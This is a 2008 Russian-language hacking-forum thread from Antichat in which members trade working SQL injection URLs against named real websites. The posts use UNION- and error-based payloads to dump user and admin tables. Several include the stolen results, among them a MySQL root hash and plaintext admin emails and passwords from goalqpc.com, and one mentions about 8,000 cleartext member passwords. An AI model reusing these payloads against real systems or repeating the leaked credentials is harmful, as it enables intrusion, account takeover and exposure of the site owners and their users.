ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
сейчас доступен на antichat.xyz.
 |
|
23.05.2008, 19:31
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.thefrantics.com/
Код:
http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
|
|
|
23.05.2008, 19:51
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
Провел на форуме:
384537
Репутация:
35
|
|
to Assembler:
http://npo.karelia.ru/?view=event&id=0+union+select+1,concat_ws(0x3,vers ion(),user(),database()),3/*
http://npo.karelia.ru/?view=event&id=0+union+select+1,concat(u_name,0x3, u_pass),3+from+vs_users/*
http://npo.karelia.ru/admin
PS: и не фурыкает чет, мож кто абразумит почему 
|
|
|
|
23.05.2008, 19:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от mefish
to Assembler:
http://npo.karelia.ru/admin
PS: и не фурыкает чет, мож кто абразумит почему
там бейсик авторризация. Скорее всего с базой не связано
__________________
BlackHat. MoDL
|
|
|
|
23.05.2008, 20:04
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
2 Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
Вот и все... Получился даже мини-FAQ  .
P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах! |
|
|
|
23.05.2008, 20:17
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.goalqpc.com/ PR:5
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limit+0,1/*
admin@goalqpc.com:deming123
support@newcastleweb.com:swissthins
Админка:
http://www.goalqpc.com/admin/
Юзеры:
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+8000,1/*
~8000 мемберов, пароли в открытом виде.
|
|
|
|
23.05.2008, 21:32
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Дом 3
http://www.dom3.ru/cgi-bin/dating.pl?action=search2&mode=html&se=-35'+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35+from+information_schema.tabl es/*&v1=18'&v2=19&re=57&fo=1&dom=1&x=16&y=12
мда
|
|
|
|
23.05.2008, 22:52
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Assembler
А как можно посмотреть пароль и админку?
ОМГ убери пробелы из ссылки 
Сообщение от gesik
Можете ктонить помоч с http://www.proline.lv/lv/brandlines?brandID=1&confID=' там чтоли фильтр стоит?
Вывод:
_http://www.proline.lv/lv/brandlines?brandID=1&confID=-2+union+select+1,2,user(),4,version(),6,7,8,9,0,11 ,12,13,14/*
|
|
|
|
24.05.2008, 04:37
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.ask4ufe.com
Код:
http://www.ask4ufe.com/transcript.cfm?pid=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
|
|
|
|
24.05.2008, 04:42
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
http://www.sequa.de Pr5
Код:
http://www.sequa.de/index.php?categ=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3/*&parent=0&p=downloads&area=1
|
|
|
|
24.05.2008, 06:47
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
CinemaBlend.Com
http://www.cinemablend.com/news.php?cid=1+union+select+1/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
